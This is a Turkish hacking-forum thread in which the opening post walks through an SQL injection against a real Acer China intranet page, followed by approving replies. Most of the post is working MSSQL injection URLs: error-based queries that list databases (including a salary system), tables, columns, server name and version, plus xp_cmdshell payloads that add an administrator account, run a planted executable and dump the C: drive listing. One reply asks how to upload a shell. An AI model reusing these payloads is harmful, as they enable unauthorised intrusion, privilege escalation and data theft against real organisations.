Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
Laptop Firması Acer Hacked /Sql İnjection
Laptop Firması Acer Hacked /Sql İnjection
-
Arkadaşlar malum vizeler bitti boşluğumuz var hazır sitedede bilişim konularına ağırlık veriliyorken
Sql injectionu sadece 'a yapmak zanneden arkadaşlar için ufak bir siteyle uğraştım :)
Sql injection ile adamların sunucuda cirit attım C:,D: Gibi sürücülerinin içinde gezdim vs
Kesinlikle hackleme gibi bir amacım yoktur zaten site birkaç kişi tarafındanda hacklenmiştir
Ben sadece size yöntemi anlatacağımki arkadaşlar yararlansın sonra tartışma yaşanmasın ...
Adım adım anlatayım ...
Sitemiz meşhur bilgisayar üreticisi Acer dir .
İlk önce acerin çin domainine girdim ufak bir kurcalama yaptım siteyle pek ilgilenmiyorlar herhalde
halen hacked falan yazıları duruyordu ( ayıp ayıp ) :)
Neyse biraz subdomainleri karıştırdım karşıma burası çıktı
http://amsintranet.acer.com.cn/rules/holiday/holiday.asp?ams=BJ
Ardından
http://amsintranet.acer.com.cn/rules/holiday/holiday.asp?ams=BJ'a yaptık ve hatamızı aldık çincem yok ama
Büyük ihtimal unclosed hatası buda update yapılacağını gösteriyor
Daha sonra database adlarını almaya başladım
intranet , salarysystem gibi database isimlerini vermeye başladı
(Not : Diğer database adlarını öğrenmek için db_name(0) içindeki sıfırı 1 yaparak artırıp öğrenin )
Ardından sıra geldi tabloları öğrenmeye
http://amsintranet.acer.com.cn/rules/holiday/holiday.asp?ams=BJ' and 1=convert(int, (select top 1 name from sysobjects where xtype='u'and name>'a'));--
Yapınca birde baktıkki adm2000 gibi bir tablo adı verdi neyse bir sonraki tabloyu öğrenmek içinde name>'adm2000' gibi yaparak sırayla tablolarıda
öğrendik eywallahŞimdi mesela adm2000 adlı tablonun kolonları öğrenelim
http://amsintranet.acer.com.cn/rules/holiday/holiday.asp?ams=BJ' and 1=convert(int, (select top 1 name from syscolumns where colid=1 and id=(select top 1 id from sysobjects where xtype='u' and name='adm2000')));--
yaparak colid=1 sayısını sürekli 1 artırarak kolon isimlerini sırayla okuyoruz ..
Neyse buraya kadar herşey standart birkaç bilgi daha vereyim
Makina adi: www.hedefsite.com/news.asp?id=1 and 1=convert(int, @@servername);--
Version: www.hedefsite.com/news.asp?id=1 and 1=convert(int, @@version);--
Servis Adi: www.hedefsite.com/news.asp?id=1 and 1=convert(int, @@servicename);--
Gibi bilgileride yukarıda bahsettiğim şekilde çekebilirsiniz
Siteye uzak masaüstü bağlantısı yapmak için birkaç şey denedim bakma fırsatım olmadı :)
Uzak masaüstü bağlantısı için ;
http://amsintranet.acer.com.cn/rules/holiday/holiday.asp?ams=BJ'exec%20master..xp_cmdshell 'net localgroup administrators Twitter /add';--
Mesela olduda sunucuya shell attınız ardından windows sunucu olduğunu gördünüz ve trojan atıp makineyi ele geçireceksiniz
Fakat shell sizin exe nizi çalıştırmıyor webmaster disable etmiş bazı fonksiyonları o zaman bizde sql üzerinden devreye bu kodu sokuyoruz :)
http://amsintranet.acer.com.cn/rules/holiday/holiday.asp?ams=BJ'exec%20master..xp_cmdshell 'C:/Program Files/a.exe';--
Neyse başka bir felaket senaryosuna geçelim herşey hacked yazmak değil sonuçta ekrana :)
Geldi en baba darbeye adamların sunucu üzerinde cirit atmaya windows makine olduğu için C: sürücüsünü görme
http://amsintranet.acer.com.cn/rules/holiday/holiday.asp?ams=BJ';drop table musty create table musty(ID int identity,Str varchar(1000)) insert into musty exec master..xp_cmdshell 'dir /b C:\';--
Yaparak musty gibi bir tablo oluşturulur ve okunan sunucu bilgileri tabloya yazılır ...
Ardından
http://amsintranet.acer.com.cn/rules/holiday/holiday.asp?ams=BJ' and 1=convert(int,(select Str from musty where ID=1));--
ID değeri değiştirilerek tabloya yazılan değerler okunur :)
Son Olarak umarım arkadaşlarıma faydası olur azda olsa ufkunu ilerletir
Elimden geldiğince birşeyler karaladım ....
Yapılacak iyi ve kötü yorumlar için şimdiden teşekkürler ...
Dipnot :)
Bunları bir programa yaptırırsanız daha iyi olur coder arkadaşlar ...
Sunucunun klasörlerine ait bir görüntü ;
-
eyvallah emeğine sağlık
-
Sql injection kullanılarak sisteme nasıl shell atılır?
Hadi atmaya çalıştık bi engel var sql injection ile bunu aşabilir miyiz?
emeğine sağlık.
-
kardeş yakalamasınlar seni
-
Eline sağlık güzel döküman olmuş, öğretici olması adına nasıl yaptığını açıklaman da ayrı güzel. Bunların dışında yedirdiğin sql ınjection farklı birşeyse onun hakkında kısa bi bilgi, ve ne bu açığın nedeni ve nasıl önleneceği hakında da kısa bi bilgi olsa daha güzel olurdu. Tabiki nette bir sürü döküman var araştırılıp öğrenilebilinir ama şimdi saatlerce aratırıp makale okumaya üşenenler için kısa kısa başlıklar halınde onlara da değinseydın daha güzel olurdu gibi :)
Güzel çalışma olmuş.
-
eline sağlık güzel paylaşım
-
eline sağlık acer iyidir aslında ama iyiki vurmuşsun :) ^^ 1337
-
turkguvenligide hacklemiş bu siteyi yani acer olmuş hacer :)